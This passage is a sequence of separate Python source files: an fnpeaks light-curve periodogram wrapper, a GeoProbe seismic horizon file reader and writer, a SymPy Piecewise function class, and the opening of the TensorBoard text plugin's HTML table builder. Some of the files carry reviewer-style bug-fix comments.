            Whether to generate power spectral density estimates
        error_max : float, optional
            Mask out measurements whose error exceeds this value
        sigmaclip : float, optional
            Sigma-clip the light curves before writing them out
        """
        # TODO reuse saved files
        if isinstance(star, (int, np.integer)):  # accept numpy integer scalars too
            star = [star]
        lc = self.lc[star]
        lc_e = self.lc_e[star] if self.lc_e is not None else None
        ids = self.ids[star] if self.ids is not None else star
        # BUG FIX: removed unused ``mask = np.ones_like(lc, dtype=bool)``
        if error_max is not None and lc_e is not None:
            # mask out measurements whose error is too large (or not finite)
            lc = np.ma.MaskedArray(lc)
            lc.mask = lc.mask | ~(lc_e < error_max)
        if sigmaclip is not None:
            lc = sigma_clip(lc, sigma=sigmaclip)
        # write the light curves as fnpeaks input files
        if self.filtermasks is None:
            write_lc(self.hjd, lc, lc_e, ids, 0.0,
                     prefix=join(self.dir.path, 'lc_'), suffix='.diff')
        else:
            if filter is None:
                filter = [f for f in self.filtermasks]
            write_lc_filters(self.filtermasks, filter, self.hjd, lc, lc_e, ids, 0.0,
                             prefix=join(self.dir.path, 'lc_'), suffix='.diff')
        # run fnpeaks once per star (and per filter when filtermasks are used)
        ret = []
        for s in star:
            if self.filtermasks is None:
                r = self._runfnpeaks(s, None, periodogram)
            else:
                r = {f: self._runfnpeaks(s, f, periodogram) for f in filter}
            ret.append(r)
        if len(ret) == 1:
            ret = ret[0]
        return ret

    def freq(self, i):
        """
        Returns i-th frequency(ies)
        """
        return self.start_freq + i * self.step_freq

    def period(self, i):
        """
        Returns i-th period(s)
        """
        return 1.0 / self.freq(i)

    def _runfnpeaks(self, star_pos, filter, periodogram):
        # map the positional index to the id used in the file names
        if self.ids is not None:
            star = np.array(self.ids)[star_pos]
        else:
            star = star_pos
        if filter is None:
            fname = 'lc_{:05d}'.format(star)
        else:
            fname = 'lc_{:05d}_{}'.format(star, filter)
        # '-f' asks fnpeaks to also write the periodogram (*.trf) file
        if periodogram:
            self.arguments = ['-f']
        else:
            self.arguments = []
        self.arguments += [fname+'.diff']
        self.arguments += ['{:f}'.format(x) for x in [self.start_freq, self.end_freq, self.step_freq]]
        self.run(wait=True)
        ret = FNpeaksResult()
        # parse the *.max file: peak rows follow a 9-line header
        with open(join(self.dir.path, fname)+'.max', 'r') as f:
            lines = f.readlines()
        peaks = Table(names=['no', 'freq', 'period', 'amplitude', 'sn'])
        for l in lines[9:]:
            if len(l) > 2:
                peaks.add_row([float(s) for s in l.split()])
        ret.peaks = peaks
        ret.freq_range = (self.start_freq, self.end_freq)
        ret.freq_step = self.step_freq
        ret.lc = self.lc[star_pos]  # TODO cache lc[:,filter] in internal dict via @property _fmask_lc(f)
        ret.lc_e = self.lc_e[star_pos] if self.lc_e is not None else None
        ret.hjd = self.hjd
        if filter is not None and self.filtermasks is not None:
            fmask = self.filtermasks[filter]
            ret.lc = ret.lc[fmask]
            ret.lc_e = ret.lc_e[fmask] if ret.lc_e is not None else None
            ret.hjd = ret.hjd[fmask]
        if periodogram:
            # *.trf holds (freq, power) pairs; keep only the power column
            ret.power = np.fromfile(join(self.dir.path, fname)+'.trf', sep=' ')[1::2]
        return ret
| |
import numpy as np
import os
import six
#-- Imports from local files --------------------------------------
from .volume import volume
from .common import read_binary, write_binary
#-- Build dtype for points ----------------------------------------
# Big-endian point record layout used by geoprobe horizon files:
# four float32 fields (x, y, z, confidence) followed by three uint8 flags.
_point_format = ('>f', '>f', '>f', '>f', '>B', '>B', '>B')
_point_names = ('x', 'y', 'z', 'conf', 'type', 'herid', 'tileSize')
_point_dtype = list(zip(_point_names, _point_format))
class horizon(object):
    """
    Reads and writes geoprobe horizon files

    horizon.x, horizon.y, and horizon.z are the x,y, and z coordinates
    stored in the horizon file (in model coordinates, i.e. inline/crossline).
    These are views into horizon.data, so any changes made to these will
    update horizon.data and vice versa.

    horizon.grid is a 2d numpy masked array of the z-values in the horizon
    masked in regions where there aren't any z-values. The extent of the grid
    is controlled by horizon.grid_extents (a tuple of xmin, xmax, ymin, ymax)
    which is inferred from the underlying x,y data if it is not specified.

    Useful attributes set at initialization:
        data: A structured numpy array with the fields 'x', 'y', 'z',
            'conf', 'type', 'herid', and 'tileSize'. This array
            contains all the data stored in the horizon file.
        surface: A view into horizon.data that contains only the points
            in the file that make up a "filled" surface. (Usually points
            interpolated between manual picks).
        lines: A list of manual picks stored in the horizon file. Each item
            in the list is a tuple of a) a 4-tuple of line information
            (xdir, ydir, zdir, ID) and b) a view into horizon.data
            containing the points in the line.
    """
    def __init__(self, *args, **kwargs):
        """
        Takes either a filename or a numpy array

        If a single string is given as input, the string is assumed to be a
        filename, and a new horizon object is constructed by reading the file
        from disk.

        Otherwise, a horizon object can be created from existing data, as
        described below:

        If one input argument is given, it is assumed to be a structured
        numpy array and is used as the filled surface portion of the
        horizon. The input array must be convertable into an array
        with a dtype of horizon.POINT_DTYPE.

        If two input arguments are given, the first is used as the filled
        surface portion of the horizon file and the second a list of lines
        in the same format as horizon.lines. The arrays must be convertable
        into an array with dtype horizon.POINT_DTYPE

        If three input arguments are given, they are assumed to be lists/arrays
        of x, y, and z coordinates (respectively) of the points in the new
        horizon.

        Alternatively, you may specify these options using the following
        keyword arguments: surface, lines, or x, y, and z.

        For example, a horizon object can be initalized in the following ways:
            h = geoprobe.horizon('/path/to/file')
            h = geoprobe.horizon(data)
            h = geoprobe.horizon(surface, lines)
            h = geoprobe.horizon(x,y,z)
            h = geoprobe.horizon(x=x, y=y, z=z)
            h = geoprobe.horizon(lines=a_list_of_lines)
            h = geoprobe.horizon(surface=surface_array)
            h = geoprobe.horizon(surface=surface, lines=lines)
        """
        # If __init__ is just passed a string, assume it's a filename
        # and make a horizon object by reading from disk
        if (len(args) == 1) and isinstance(args[0], six.string_types):
            self._readHorizon(args[0])
        # Otherwise, pass the args on to _parse_new_horizon_input for
        # parsing
        else:
            self._parse_new_horizon_input(*args, **kwargs)
        # For gridding:
        self.nodata = -9999
        # Need to make dx, dy, and dz properties...
        # How do we determine spacing without a volume?
        # d = np.abs(np.diff(self.x)); np.mean(d[d!=0]) (ideally, mode)?

    # Adding this constant so that the "correct" dtype is visible before a
    # horizon object is initialized
    POINT_DTYPE = _point_dtype

    def _readHorizon(self, filename):
        """Reads a horizon from disk"""
        self._file = HorizonFile(filename, 'rb')
        self._header = self._file.readHeader()
        if self._header == b"#GeoProbe Horizon V2.0 ascii\n":
            raise TypeError('Ascii horizons not currently supported')
        elif self._header != b"#GeoProbe Horizon V2.0 binary\n":
            raise TypeError('This does not appear to be a valid geoprobe'\
                            ' horizon')
        self.data = self._file.readAll()
        # Surface and line attributes
        self.surface = self._file.surface
        self.lines = self._file.lines
        # Oddly enough, Geoprobe (the actual Landmark application) seems to
        # do this a lot...
        # Raise the error here to avoid problems down the road!
        if self.data.size == 0:
            raise ValueError('This file does not contain any points!')

    def _parse_new_horizon_input(self, *args, **kwargs):
        """Parse input when given something other than a filename"""
        #-- Parse Arguments --------------------------------------------------
        if len(args) == 1:
            # Assume argument is data (numpy array with dtype of _point_dtype)
            self.data = self._ensure_correct_dtype(args[0])
            self.surface = self.data
        elif len(args) == 2:
            # Assume arguments are surface + lines
            # BUG FIX: a stray ``self`` was previously passed as the first
            # positional argument here, so this branch always raised
            # TypeError ("multiple values for argument 'surface'").
            self._init_from_surface_lines(surface=args[0], lines=args[1])
        elif len(args) == 3:
            # Assume arguments are x, y, and z arrays
            self._init_from_xyz(*args)
        #-- Parse keyword arguments ------------------------------------------
        elif ('x' in kwargs) and ('y' in kwargs) and ('z' in kwargs):
            self._init_from_xyz(kwargs['x'], kwargs['y'], kwargs['z'])
        elif ('surface' in kwargs) or ('lines' in kwargs):
            surface = kwargs.pop('surface', None)
            lines = kwargs.pop('lines', None)
            self._init_from_surface_lines(surface, lines)
        else:
            raise ValueError('Invalid arguments. You must specify one of:'\
                             ' x,y,&z, surface, or lines')

    def _ensure_correct_dtype(self, data):
        """Converts data into the proper dtype for points and raises a useful
        error message if it fails"""
        try:
            data = np.asarray(data, dtype=self.POINT_DTYPE)
        except (TypeError, ValueError):
            # numpy raises either exception type depending on the input
            raise TypeError('The input data cannot be converted into an array'
                            ' with dtype=%s' % repr(self.POINT_DTYPE))
        return data

    def _init_from_xyz(self, x, y, z):
        """Make a new horizon object from x, y, and z arrays"""
        x,y,z = [np.asarray(item, dtype=np.float32) for item in [x,y,z]]
        if x.size == y.size == z.size:
            self.data = np.zeros(x.size, dtype=self.POINT_DTYPE)
            self.x = x
            self.y = y
            self.z = z
            self.surface = self.data
        else:
            raise ValueError('x, y, and z arrays must be the same length')

    def _init_from_surface_lines(self, surface=None, lines=None):
        """
        Make a new horizon object from either a surface array or a list of
        line arrays
        """
        if surface is not None:
            surface = self._ensure_correct_dtype(surface)

        # Calculate total number of points
        # BUG FIX: was ``surface.size if surface else 0`` which raises
        # "truth value of an array is ambiguous" for multi-point surfaces.
        numpoints = surface.size if surface is not None else 0
        if lines is not None:
            for info, line in lines:
                numpoints += line.size

        # Make self.data and make self.lines & self.surface views into
        # self.data
        self.data = np.zeros(numpoints, dtype=self.POINT_DTYPE)
        array_list = []
        if surface is not None:
            array_list.append((None, surface))
        if lines is not None:
            array_list.extend(lines)

        i = 0
        self.lines = []
        for info, item in array_list:
            self.data[i:i+item.size] = item
            if (surface is not None) and (i == 0):
                self.surface = self.data[i:i+item.size]
            else:
                self.lines.append((info, self.data[i:i+item.size]))
            i += item.size

    def write(self, filename):
        """
        Write the horizon to a new file ("filename")
        """
        self._file = HorizonFile(filename, 'wb')
        # If self.lines isn't set, default to []
        try:
            self._file.lines = self.lines
        except AttributeError:
            self._file.lines = []
        # If self.surface isn't set, default to an empty numpy array
        try:
            self._file.surface = self.surface
        except AttributeError:
            self._file.surface = np.zeros(0, dtype=self.POINT_DTYPE)
        self._file.writeAll()

    @property
    def numpoints(self):
        """The total number of points stored in the horizon
        (equivalent to horizon.data.size)"""
        return self.data.size

    #-- xmin, xmax, etc properties -------------------------------------------
    xmin = property(lambda self: self.x.min(), doc='Mininum X-coordinate')
    ymin = property(lambda self: self.y.min(), doc='Mininum Y-coordinate')
    zmin = property(lambda self: self.z.min(), doc='Mininum Z-coordinate')
    xmax = property(lambda self: self.x.max(), doc='Maximum X-coordinate')
    ymax = property(lambda self: self.y.max(), doc='Maximum Y-coordinate')
    zmax = property(lambda self: self.z.max(), doc='Maximum Z-coordinate')
    #--------------------------------------------------------------------------

    #-- x,y,z properties ------------------------------------------------------
    def _get_coord(self, name):
        return self.data[name]

    def _set_coord(self, name, value):
        self.data[name] = value

    x = property(lambda self: self._get_coord('x'),
                 lambda self, value: self._set_coord('x', value),
                 doc='X-coordinates of all points stored in the horizon')
    y = property(lambda self: self._get_coord('y'),
                 lambda self, value: self._set_coord('y', value),
                 doc='Y-coordinates of all points stored in the horizon')
    z = property(lambda self: self._get_coord('z'),
                 lambda self, value: self._set_coord('z', value),
                 doc='Z-coordinates of all points stored in the horizon')
    #--------------------------------------------------------------------------

    #-- Grid Extents Property -------------------------------------------------
    def _get_grid_extents(self):
        """A tuple of (xmin, ymin, xmax, ymax) indicating the extent (in model
        coordinates) of self.grid. This is inferred from the extents of the
        horizon's data unless it is manually set, in which case the self.grid
        will cover the indicated area."""
        try:
            return self._grid_extents
        except AttributeError:
            self._grid_extents = (self.xmin, self.xmax, self.ymin, self.ymax)
            return self._grid_extents

    def _set_grid_extents(self, value):
        xmin, xmax, ymin, ymax = value
        if (xmin > xmax) or (ymin > ymax):
            raise ValueError('Grid extents must be (xmin, xmax, ymin, ymax)')
        self._grid_extents = value
        # Delete the cache of self.grid, as it will now be invalid.
        try:
            del self._grid
        except AttributeError:
            pass

    grid_extents = property(_get_grid_extents, _set_grid_extents)
    #--------------------------------------------------------------------------

    #-- Grid Property ---------------------------------------------------------
    def _get_grid(self):
        """An nx by ny numpy array (dtype=float32) of the z values contained
        in the horizon file"""
        try:
            return self._grid
        except AttributeError:
            x, y, z = self.x, self.y, self.z
            xmin, xmax, ymin, ymax = self.grid_extents
            ny, nx = int(ymax - ymin + 1), int(xmax - xmin + 1)
            grid = self.nodata * np.ones((ny, nx), dtype=np.float32)
            # column/row indices of each point inside the grid
            # (plain ``int``: the ``np.int`` alias was removed in numpy>=1.24)
            I = np.array(x - xmin, dtype=int)
            J = np.array(y - ymin, dtype=int)
            inside_extents = (I >= 0) & (I < nx) & (J >= 0) & (J < ny)
            I = I[inside_extents]
            J = J[inside_extents]
            grid[J,I] = z[inside_extents]
            grid = np.ma.masked_values(grid, self.nodata, copy=False)
            grid.fill_value = self.nodata
            self._grid = grid
            return self._grid

    def _set_grid(self, value):
        self._grid = np.ma.asarray(value)

    grid = property(_get_grid, _set_grid)
    #--------------------------------------------------------------------------

    @property
    def name(self):
        """Base file name (without the '.hzn' extension), or '' if not
        backed by a file."""
        try:
            _file = self._file
        except AttributeError:
            return ''
        basedir, basename = os.path.split(_file.name)
        if basename.endswith('.hzn'):
            return basename[:-4]
        else:
            return basename

    def strikeDip(self, vol=None, velocity=None):
        """
        Returns a strike and dip of the horizon following the Right-hand-rule.

        Input:
            vol (optional): A geoprobe volume object
                If specified, the x, y, and z units will be converted
                to world units based on the volume's header.
            velocity (optional): Velocity in meters/second
                If specified, the z units will be converted from time
                into depth using the velocity given. Assumes the z
                units are milliseconds!!
        Output:
            strike, dip
        """
        # Delayed import to avoid circular dependency
        from .utilities import points2strikeDip
        return points2strikeDip(self.x, self.y, self.z,
                                vol=vol, velocity=velocity)

    def toGeotiff(self, filename, vol=None, nodata=None, zscale=None):
        """
        Create and write a geotiff file from the geoprobe horizon object.

        The Z values in the output tiff will be stored as 32bit floats.

        Input:
            filename: Output filename
            vol (optional): A geoprobe volume object or path to a geoprobe
                volume file. If vol is specified, the geotiff will be
                georeferenced based on the data in the volume header (and will
                therefore be in same projection as the volume's world
                coordinates). Otherwise the geotiff is created using the model
                coordinates stored in the geoprobe horizon file.
            nodata (default=self.nodata (-9999)): Value to use for NoData.
            zscale (optional): Scaling factor to use for the Z-values. If vol
                is specified, and vol.dz is negative, this defaults to -1.
                Otherwise this defaults to 1.
        """
        # Delayed import to avoid circular dependency
        from .utilities import array2geotiff

        if vol is not None:
            # accept a path to a volume file as well as a volume object
            # (isinstance check kept consistent with __init__)
            if isinstance(vol, six.string_types):
                vol = volume(vol)
            Xoffset, Yoffset = vol.model2world(self.xmin, self.ymin)
            transform = vol
        else:
            Xoffset, Yoffset = 0,0
            transform = None

        if nodata is None:
            nodata = self.nodata

        # Zscale is not 1 by default, as I want the default to be set by
        # vol.dz and any specified value to override the default
        if zscale is None:
            if vol is None: zscale = 1
            elif vol.dz > 0: zscale = 1
            elif vol.dz < 0: zscale = -1

        # BUG FIX: operate on a copy -- the previous in-place ``*= zscale``
        # mutated the cached self.grid, so repeated calls double-scaled it.
        data = self.grid.copy()
        data.fill_value = nodata
        data *= zscale
        data = data.filled()

        array2geotiff(data, filename, nodata=nodata,
                      extents=(Xoffset, Yoffset), transform=transform)
#-- This is currently very sloppy code... Need to clean up and document
class HorizonFile(object):
    """Basic geoprobe horizon binary file format reader

    Disk layout of Geoprobe horizons
    Reverse engineered by JDK, Feb. 2009
    Format descrip:
        1 ascii line w/ version (terminated with newline)
        There are two "sections" in every file.
        The first section contains x,y,z points making a "filled" surface
        (This is basically a sparse matrix)
        The second section contains lines (manual picks)
        Both section types have a 4 byte header (seems to be >I?)
        The first section (surface) always (?) has a section header
        value of '\x00\x00\x00\x13' (unpacks to 19)
        The second section (manual picks) contains the number of
        manually picked lines in the file (packed as >I).
        Subsections
        The first section only has one subsection, a "filled" surface
        Surface header: (>I) Number of points in the surface
        The second section contains "numlines" subsections containing
        manual picks (lines):
        Line header: (>4f) xdir,ydir,zdir,ID
        Point Format in all sections: (>4f3B)
        x,y,z,confidence,type,heridity,tileSize
    """
    # struct format strings (big-endian) for the on-disk headers.
    _sectionHdrFmt = '>I'
    _surfaceHdrFmt = '>I'
    _lineHdrFmt = '>4f'
    def __init__(self, *args, **kwargs):
        """Accepts the same argument set as a standard python file object"""
        # Initalize the file object as normal
        self._file = open(*args, **kwargs)
    def readHeader(self):
        """Rewind to the start of the file and return the one-line ascii
        version string (leaves the file positioned at the first section)."""
        self._file.seek(0)
        return self._file.readline()
    def readPoints(self):
        """Read one point subsection at the current position: a (>I) count
        followed by that many packed point records.

        Returns a numpy structured array. NOTE(review): read_binary and
        _point_dtype are module-level helpers defined elsewhere in this file.
        """
        numPoints = read_binary(self._file, self._surfaceHdrFmt)
        points = np.fromfile(self._file, count=numPoints, dtype=_point_dtype)
        return points
    def readSectionHeader(self):
        """Read and return a 4-byte (>I) section header at the current
        position."""
        return read_binary(self._file, self._sectionHdrFmt)
    def readLineHeader(self):
        """Read a (>4f) manual-pick line header: direction vector components
        (xdir, ydir, zdir) and the line's numeric ID."""
        # TODO: Change this to a numpy array
        xdir,ydir,zdir,ID = read_binary(self._file, self._lineHdrFmt)
        return xdir, ydir, zdir, ID
    def readAll(self):
        """
        Reads in the entire horizon file and returns a numpy array with the
        fields ('x', 'y', 'z', 'conf', 'type', 'herid', 'tileSize') for each
        point in the horizon.

        Side effects: sets self.numlines, self.surface (a view of the first
        part of the returned array) and self.lines (a list of
        (line_header, points_view) tuples).
        """
        # Note: The total number of points in the file is not directly stored
        # on disk. Therefore, we must read through the entire file, store
        # each section's points in a list, and then create a contigious array
        # from them. Using numpy.append is much simpler, but quite slow.
        # Jump to start of file, past header
        self.readHeader()
        # Read points section
        self.readSectionHeader() # Should always return 19
        surface = self.readPoints()
        temp_points = [surface]
        # Read lines section
        line_info = [None]
        self.numlines = self.readSectionHeader()
        for i in six.moves.range(self.numlines):
            line_info.append(self.readLineHeader())
            currentPoints = self.readPoints()
            temp_points.append(currentPoints)
        # Create a single numpy array from the list of arrays (temp_points)
        numpoints = sum(map(np.size, temp_points))
        points = np.zeros(numpoints, dtype=_point_dtype)
        self.lines = []
        i = 0
        for info, item in zip(line_info, temp_points):
            points[i : i + item.size] = item
            # self.surface is a view into the first part of the points array
            # NOTE(review): if the surface section is empty (size 0), the
            # first manual-pick line would also hit i == 0 and be treated as
            # the surface -- confirm whether empty surfaces occur in practice.
            if i == 0:
                self.surface = points[i:i+item.size]
            # self.lines is a list of tuples, the first item is a tuple of
            # (xdir,ydir,zdir,ID) where <xdir,ydir,zdir> form a vector in
            # the direction of the line. The second item is a view into the
            # points array containg the relevant x,y,z,etc points.
            else:
                self.lines.append((info, points[i:i+item.size]))
            i += item.size
        return points
    def writeHeader(self):
        """Write the canonical version line at the start of the file.
        NOTE(review): writes a str -- presumably the file is opened in a mode
        where this is valid; confirm against how __init__ is invoked."""
        header = "#GeoProbe Horizon V2.0 binary\n"
        self._file.seek(0)
        self._file.write(header)
    def writePoints(self, points):
        """Write one point subsection: a (>I) count followed by the raw
        records of the structured array `points`."""
        numPoints = points.size
        write_binary(self._file, self._surfaceHdrFmt, numPoints)
        points.tofile(self._file)
    def writeLineHeader(self, line_hdr):
        """Write a (>4f) line header (xdir, ydir, zdir, ID)."""
        write_binary(self._file, self._lineHdrFmt, line_hdr)
    def writeSectionHeader(self, sec_hdr):
        """Write a 4-byte (>I) section header."""
        write_binary(self._file, self._sectionHdrFmt, sec_hdr)
    def writeAll(self):
        """Write the whole horizon back out in the on-disk layout described
        in the class docstring: header, surface section (header value 19),
        then one subsection per manual-pick line in self.lines."""
        self.writeHeader()
        self.writeSectionHeader(19)
        self.writePoints(self.surface)
        self.writeSectionHeader(len(self.lines))
        for (info, line) in self.lines:
            self.writeLineHeader(info)
            self.writePoints(line)
| |
from sympy.core.basic import Basic, S
from sympy.core.function import Function, diff
from sympy.core.numbers import Number
from sympy.core.relational import Relational
from sympy.core.sympify import sympify
from sympy.utilities.decorator import deprecated
class ExprCondPair(Basic):
    """An (expression, condition) pair, as used in Piecewise arguments.

    Supports tuple-style unpacking: ``expr, cond = pair``.
    """
    def __new__(cls, expr, cond, **assumptions):
        # Sympify both members up front so downstream code can rely on
        # Basic semantics.
        return Basic.__new__(cls, sympify(expr), sympify(cond), **assumptions)
    @property
    def expr(self):
        """The expression half of the pair."""
        return self.args[0]
    @property
    def cond(self):
        """The condition half of the pair."""
        return self.args[1]
    def __iter__(self):
        yield self.expr
        yield self.cond
class Piecewise(Function):
    """
    Represents a piecewise function.

    Usage
    =====
      Piecewise( (expr,cond), (expr,cond), ... )
        - Each argument is a 2-tuple defining an expression and condition
        - The conds are evaluated in turn returning the first that is True.
          If any of the evaluated conds are not determined explicitly False,
          e.g. x < 1, the function is returned in symbolic form.
        - If the function is evaluated at a place where all conditions are
          False, a ValueError exception will be raised.
        - Pairs where the cond is explicitly False, will be removed.

    Examples
    ========
      >>> from sympy import *
      >>> x = Symbol('x')
      >>> f = x**2
      >>> g = log(x)
      >>> p = Piecewise( (0, x<-1), (f, x<=1), (g, True))
      >>> p.subs(x,1)
      1
      >>> p.subs(x,5)
      log(5)
    """
    nargs = None

    def __new__(cls, *args, **options):
        # Validate that every argument is an (expr, cond) 2-tuple with a
        # usable condition type before sympifying anything.
        for ec in args:
            if not isinstance(ec, tuple) or len(ec) != 2:
                raise TypeError("args may only include (expr, cond) pairs")
            cond_type = type(ec[1])
            if not (cond_type is bool or issubclass(cond_type, Relational) or
                    issubclass(cond_type, Number)):
                raise TypeError(
                    "Cond %s is of type %s, but must be a bool,"
                    " Relational or Number" % (ec[1], cond_type))
        # sympify args
        args = [ExprCondPair(*ec) for ec in args]
        r = cls.eval(*args)
        if r is None:
            return Basic.__new__(cls, *args, **options)
        return r

    def __getnewargs__(self):
        # Convert ExprCondPair objects to plain tuples (for pickling).
        return tuple((expr, condition) for expr, condition in self.args)

    @classmethod
    @deprecated
    def canonize(cls, *args):
        """Deprecated alias for eval()."""
        return cls.eval(*args)

    @classmethod
    def eval(cls, *args):
        # Check for situations where we can evaluate the Piecewise object.
        # 1) Hit an unevaluatable cond (e.g. x<1) -> keep object
        # 2) Hit a true condition -> return that expr
        # 3) Remove false conditions, if no conditions left -> raise ValueError
        all_conds_evaled = True
        non_false_ecpairs = []
        for expr, cond in args:
            cond_eval = cls.__eval_cond(cond)
            if cond_eval is None:
                all_conds_evaled = False
                non_false_ecpairs.append((expr, cond))
            elif cond_eval:
                # Only collapse to this expr if every earlier cond was
                # decidable (and hence False); otherwise keep the pair.
                if all_conds_evaled:
                    return expr
                non_false_ecpairs.append((expr, cond))
        if len(non_false_ecpairs) != len(args):
            return Piecewise(*non_false_ecpairs)
        # Count number of arguments and record the maximum on the class.
        nargs = 0
        for expr, cond in args:
            if hasattr(expr, 'nargs'):
                nargs = max(nargs, expr.nargs)
            elif hasattr(expr, 'args'):
                nargs = max(nargs, len(expr.args))
        if nargs:
            # BUG FIX: the original assigned to "cls.narg", an attribute
            # that is never read anywhere; the class attribute declared
            # above (and used by the Function machinery) is "nargs".
            cls.nargs = nargs
        return None

    def doit(self, **hints):
        """Evaluate each expr and cond via their own doit()."""
        return Piecewise(*[(e.doit(), c.doit()) for e, c in self.args])

    def _eval_integral(self, x):
        """Integrate each branch expression; conditions are unchanged."""
        from sympy.integrals import integrate
        return Piecewise(*[(integrate(e, x), c) for e, c in self.args])

    def _eval_interval(self, sym, a, b):
        """Evaluates the function along the sym in a given interval ab"""
        # FIXME: Currently only supports conds of type sym < Num, or Num < sym
        int_expr = []
        mul = 1
        if a > b:
            # Integration-style orientation: flip the interval, negate result.
            a, b, mul = b, a, -1
        default = None
        # Determine what intervals the expr,cond pairs affect.
        # 1) If cond is True, then log it as default
        # 1.1) Currently if cond can't be evaluated, throw NotImplentedError.
        # 2) For each inequality, if previous cond defines part of the interval
        #    update the new conds interval.
        #    - eg x < 1, x < 3 -> [oo,1],[1,3] instead of [oo,1],[oo,3]
        # 3) Sort the intervals to make it easier to find correct exprs
        for expr, cond in self.args:
            if isinstance(cond, bool) or cond.is_Number:
                if cond:
                    default = expr
                    break
                else:
                    continue
            curr = list(cond.args)
            if cond.args[0] == sym:
                curr[0] = S.NegativeInfinity
            elif cond.args[1] == sym:
                curr[1] = S.Infinity
            else:
                raise NotImplementedError(
                    "Currently only supporting evaluation with only "
                    "sym on one side of the relation.")
            curr = [max(a, curr[0]), min(b, curr[1])]
            # Clip against every interval claimed by an earlier cond.
            for n in range(len(int_expr)):
                if self.__eval_cond(curr[0] < int_expr[n][1]) and \
                        self.__eval_cond(curr[0] >= int_expr[n][0]):
                    curr[0] = int_expr[n][1]
                if self.__eval_cond(curr[1] > int_expr[n][0]) and \
                        self.__eval_cond(curr[1] <= int_expr[n][1]):
                    curr[1] = int_expr[n][0]
            if self.__eval_cond(curr[0] < curr[1]):
                int_expr.append(curr + [expr])
        int_expr.sort(key=lambda x: x[0])
        # Add holes to list of intervals if there is a default value,
        # otherwise raise a ValueError.
        holes = []
        curr_low = a
        for int_a, int_b, expr in int_expr:
            if curr_low < int_a:
                holes.append([curr_low, min(b, int_a), default])
            curr_low = int_b
            if curr_low > b:
                break
        if holes and default is not None:
            int_expr.extend(holes)
        elif holes and default is None:
            raise ValueError(
                "Called interval evaluation over piecewise "
                "function on undefined intervals %s" %
                ", ".join([str((h[0], h[1])) for h in holes]))
        # Finally run through the intervals and sum the evaluation.
        ret_fun = 0
        for int_a, int_b, expr in int_expr:
            ret_fun += expr._eval_interval(sym, max(a, int_a), min(b, int_b))
        return mul * ret_fun

    def _eval_derivative(self, s):
        """Differentiate each branch expression; conditions are unchanged."""
        return Piecewise(*[(diff(e, s), c) for e, c in self.args])

    def _eval_subs(self, old, new):
        if self == old:
            return new
        new_args = []
        for e, c in self.args:
            if isinstance(c, bool):
                # bools have no _eval_subs; substitute in the expr only.
                new_args.append((e._eval_subs(old, new), c))
            else:
                new_args.append((e._eval_subs(old, new), c._eval_subs(old, new)))
        return Piecewise(*new_args)

    @classmethod
    def __eval_cond(cls, cond):
        """Returns S.One if True, S.Zero if False, or None if undecidable."""
        if isinstance(cond, bool) or cond.is_number or \
                (cond.args[0].is_Number and cond.args[1].is_Number):
            if cond:
                return S.One
            return S.Zero
        return None
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The TensorBoard Text plugin."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import json
import textwrap
# pylint: disable=g-bad-import-order
# Necessary for an internal test with special behavior for numpy.
import numpy as np
# pylint: enable=g-bad-import-order
import tensorflow as tf
from werkzeug import wrappers
from tensorboard import plugin_util
from tensorboard.backend import http_util
from tensorboard.plugins import base_plugin
from tensorboard.plugins.text import metadata
# HTTP routes
TAGS_ROUTE = '/tags'
TEXT_ROUTE = '/text'
WARNING_TEMPLATE = textwrap.dedent("""\
**Warning:** This text summary contained data of dimensionality %d, but only \
2d tables are supported. Showing a 2d slice of the data instead.""")
def make_table_row(contents, tag='td'):
  """Build one HTML table row from an iterable of cell contents.

  Args:
    contents: An iterable yielding strings, one per cell.
    tag: Tag each cell is wrapped in. Defaults to 'td'; use 'th' for headers.

  Returns:
    A single string: the cells wrapped in a <tr> element, one cell per line.

  Example: make_table_row(['one', 'two', 'three']) == '''
  <tr>
  <td>one</td>
  <td>two</td>
  <td>three</td>
  </tr>'''
  """
  cells = ['<%s>%s</%s>\n' % (tag, cell, tag) for cell in contents]
  return '<tr>\n%s</tr>\n' % ''.join(cells)
def make_table(contents, headers=None):
  """Given a numpy ndarray of strings, concatenate them into a html table.

  Args:
    contents: A np.ndarray of strings. May be 1d or 2d. In the 1d case, the
      table is laid out vertically (i.e. row-major).
    headers: A np.ndarray or list of string header names for the table.

  Returns:
    A string containing all of the content strings, organized into a table.

  Raises:
    ValueError: If contents is not a np.ndarray.
    ValueError: If contents is not 1d or 2d.
    ValueError: If headers is present and not a list, tuple, or ndarray.
    ValueError: If headers is not 1d.
    ValueError: If number of elements in headers does not correspond to number
      of columns in contents.
  """
  if not isinstance(contents, np.ndarray):
    raise ValueError('make_table contents must be a numpy ndarray')
  if contents.ndim not in [1, 2]:
    raise ValueError('make_table requires a 1d or 2d numpy array, was %dd' %
                     contents.ndim)
  # BUG FIX: the original used `if headers:`, which raises "the truth value
  # of an array with more than one element is ambiguous" whenever headers is
  # a multi-element np.ndarray -- one of the documented input types. Test
  # for None explicitly, then for emptiness after conversion.
  header = ''
  if headers is not None:
    if isinstance(headers, (list, tuple)):
      headers = np.array(headers)
    if not isinstance(headers, np.ndarray):
      raise ValueError('Could not convert headers %s into np.ndarray' % headers)
    if headers.size:
      if headers.ndim != 1:
        raise ValueError('Headers must be 1d, is %dd' % headers.ndim)
      expected_n_columns = contents.shape[1] if contents.ndim == 2 else 1
      if headers.shape[0] != expected_n_columns:
        raise ValueError('Number of headers %d must match number of columns %d' %
                         (headers.shape[0], expected_n_columns))
      header = '<thead>\n%s</thead>\n' % make_table_row(headers, tag='th')
  n_rows = contents.shape[0]
  if contents.ndim == 1:
    # If it's a vector, we need to wrap each element in a new list, otherwise
    # we would turn the string itself into a row (see test code)
    rows = (make_table_row([contents[i]]) for i in range(n_rows))
  else:
    rows = (make_table_row(contents[i, :]) for i in range(n_rows))
  return '<table>\n%s<tbody>\n%s</tbody>\n</table>' % (header, ''.join(rows))
def reduce_to_2d(arr):
  """Given a np.npdarray with nDims > 2, reduce it to 2d.

  It does this by selecting the zeroth coordinate for every dimension greater
  than two.

  Args:
    arr: a numpy ndarray of dimension at least 2.

  Returns:
